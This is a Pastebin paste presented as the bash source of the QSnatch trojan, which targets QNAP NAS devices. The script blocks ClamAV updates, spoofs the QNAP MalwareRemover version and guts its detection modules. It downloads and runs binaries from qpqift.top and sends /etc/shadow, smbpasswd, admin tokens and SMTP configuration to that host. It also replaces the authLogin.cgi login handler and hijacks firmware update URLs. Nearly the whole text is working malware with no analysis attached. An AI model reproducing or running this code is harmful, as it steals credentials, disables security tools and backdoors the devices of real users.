FlyFar

HEUR-Trojan.Shell.QSnatch.c_9d76d - Source Code

Jun 11th, 2023
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 10.94 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2. ts=1548478800
  3. PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
  4. test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
  5. test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
  6. test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
  7. test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
  8. test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
  9. test -d "$bdir" && break; bdir=''
  10. done <<EOF
  11. $(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
  12. EOF
  13. test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
  14. test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
  15.  
  16. getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 9.0.0 -f /etc/config/qpkg.conf
  17. getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-02-25 -f /etc/config/qpkg.conf
  18. getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 1551070800 -f /etc/config/qpkg.conf
  19.  
  20. if grep "ipv6.clamav.net" /etc/hosts; then
  21. :
  22. else
  23. countries='ac ad ae af ag ai al am an ao aq ar as at au aw ax az ba bb bd be bf bg bh bi bj bl bm bn bo bq br bs bt bv bw by bz ca cc cd cf cg ch ci ck cl cm cn co cr cu cv cw cx cy cz de dj dk dm do dz ec ee eg eh er es et eu fi fj fk fm fo fr ga gb gd ge gf gg gh gi gl gm gn gp gq gr gs gt gu gw gy hk hm hn hr ht hu id ie il im in io iq ir is it je jm jo jp ke kg kh ki km kn kp kr kw ky kz la lb lc li lk lr ls lt lu lv ly ma mc md me mf mg mh mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nc ne nf ng ni nl no np nr nu nz om pa pe pf pg ph pk pl pm pn pr ps pt pw py qa re ro rs ru rw sa sb sc sd se sg sh si sj sk sl sm sn so sr ss st su sv sx sy sz tc td tf tg th tj tk tl tm tn to tp tr tt tv tw tz ua ug uk um us uy uz va vc ve vg vi vn vu wf ws ye yt za zm zw'
  24.  
  25. { for host in 'bugs.clamav.net' 'current.cvd.clamav.net' 'database.clamav.net' 'db.local.clamav.net' 'update.nai.com'; do
  26. echo "0.0.0.0 ${host}"
  27. done
  28.  
  29. for country in $countries; do
  30. echo "0.0.0.0 db.${country}.clamav.net"
  31. echo "0.0.0.0 db.${country}.ipv6.clamav.net"
  32. echo "0.0.0.0 db.${country}.big.clamav.net"
  33. done; } >>/etc/hosts
  34. fi
  35.  
  36. test -z "$PWD" && PWD=$(pwd)
  37. CWD="$PWD"
  38. if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
  39.         CWD=''
  40.         for dir in '.config' '.liveupdate'; do
  41.                 dir="${bdir}/.qpkg/${dir}"
  42.                 test -d "$dir" && cd "$dir" && CWD="$dir" && break
  43.         done
  44. fi
  45. test "$CWD" && test -d "$CWD" && cd "$CWD"
  46.  
  47. sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
  48. verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
  49. grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
  50. for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
  51. if [ -f "${path#*/}" ]; then
  52. grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
  53. elif [ -f "${bdir}/.qpkg/${path}" ]; then
  54. test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
  55. fi
  56. done
  57.  
  58. sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'/CXqrBM2CVbJo'"'"';verifykey="${verifykey}"'"'"'g4rwwSz1Bp1i1'"'/"
  59. grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1'"'"
  60. for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
  61. if [ -f "${path#*/}" ]; then
  62. grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
  63. elif [ -f "${bdir}/.qpkg/${path}" ]; then
  64. test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
  65. fi
  66. done
  67.  
  68. version=$(getcfg System Version)
  69. test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
  70.  
  71. for file in /etc/config/rssdoc/qpkgcenter_*.xml
  72. do
  73. test -f "$file" && rm "$file" && cp "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file" && test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
  74. done
  75. file=''
  76. if find /etc/config/ | grep 'qpkgcenter_.*\.xml'; then
  77. :
  78. else
  79. cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
  80. test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
  81. fi
  82.  
  83. if [ ! -f ".qdisk_cmd" ]; then
  84.     case "$(uname -m)" in
  85.     *x86_64*)
  86.             arch=x86_64
  87.             binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
  88.             ;;
  89.     *arm*)
  90.             arch=arm
  91.             binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
  92.             ;;
  93.     *i*86*)
  94.             arch=i486
  95.             binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
  96.             ;;
  97.     esac
  98.    
  99.     if [ "x${binhash}" != 'x' ]; then
  100.         curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
  101.         test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
  102.         if [ "x${rsynchash}" = "x${binhash}" ]; then
  103.             mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
  104.         else
  105.             rm -f '.qdisk_cmd.tmp'
  106.         fi
  107.     fi
  108. fi
  109. binhash=''; rsynchash=''
  110.  
  111. for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
  112. test -d "$qpkgdir" && break
  113. done
  114. test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
  115. test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover"
  116.  
  117. if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
  118. for file in 10_derek_3.pyc 12_derek_3.pyc; do
  119. test ! -f "${qpkgdir}/MalwareRemover/modules/${file}" || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" && cat >"${qpkgdir}/MalwareRemover/modules/${file}" <<"EOF"
  120. #!/bin/sh
  121. exit 0
  122. EOF
  123. chmod +x "${qpkgdir}/MalwareRemover/modules/${file}"
  124. test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
  125. done
  126. fi
  127. file=''; qpkgdir=''
  128.  
  129. if [ ! -f .rsakey ]; then
  130. verifykey='-----BEGIN PUBLIC KEY-----
  131. MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
  132. CXqrBM2CVbJog4rwwSz1Bp1i1'
  133. verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
  134. RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
  135. Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
  136. gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
  137. 2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
  138. 0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
  139. pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
  140. DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
  141. -----END PUBLIC KEY-----'
  142. test -f ".rsakey" || echo "$verifykey" > ".rsakey"
  143. fi
  144.  
  145. if [ ! -f "${ts}_c" ]; then
  146. key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
  147. test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
  148. { echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
  149. { echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
  150. fi
  151.  
  152. cgibindir='/home/httpd/cgi-bin'
  153. if [ ! -f "1547971200_c" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
  154.     case "$(uname -m)" in
  155.     *x86_64*)
  156.             arch=x86_64
  157.             binhash='pt+a/Y3gGOPe9uyBgm85h2eOQV8='
  158.             ;;
  159.     *arm*)
  160.             arch=arm
  161.             binhash='W5SbpKsI90NUy4uQg3Pm1agAFho='
  162.             ;;
  163.     *i*86*)
  164.             arch=i486
  165.             binhash='TagzVbVf5YhxA3ZXwgBMQKw2zG4='
  166.             ;;
  167.     esac
  168.    
  169.     if [ "x${binhash}" != 'x' ]; then
  170.         curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal_${arch}" || rm -f ".qal"
  171.         test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
  172.         if [ "x${rsynchash}" = "x${binhash}" ]; then
  173.             test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
  174.             mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod +x "${cgibindir}"/authLogin.cgi
  175.         fi
  176.     fi
  177.     test -f "1547971200_c" || touch "1547971200_c"
  178. fi
  179.  
  180. test ! -f "${cgibindir}"/authLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
  181.  
  182. if [ ! -d rssdoc ]; then
  183. command -v bunzip2 && compext=bz2 || compext=gz
  184. curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" || { rm "rssdoc.tar.${compext}" && exit 1; }
  185. test -f "rssdoc.tar.${compext}" || exit 1
  186. rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)"
  187. test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA=" || { rm -f "rssdoc.tar.${compext}"; exit 1; }
  188. test "$compext" = bz2 && tarflag=j || tarflag=z
  189. tar -x${tarflag}f "rssdoc.tar.${compext}" || { rm -f rssdoc.tar.{,.${compext}}; exit 1; }
  190. rm -f "rssdoc.tar.${compext}"
  191. fi
  192.  
  193. rm /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
  194. ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
  195.  
  196. if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
  197. internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
  198. localupdateurl="http://127.0.0.1:${internalwebport}"
  199. sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
  200. fi
  201.  
  202. test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
  203. if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
  204. sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
  205. lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
  206. sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
  207. kill -2 "$sshpid"
  208. fi
  209.  
  210. test -f "${ts}_c" || touch "${ts}_c"
  211. rm -f "${CWD}/".tmp.*
  212. exit 0
Add Comment
Please, Sign In to add comment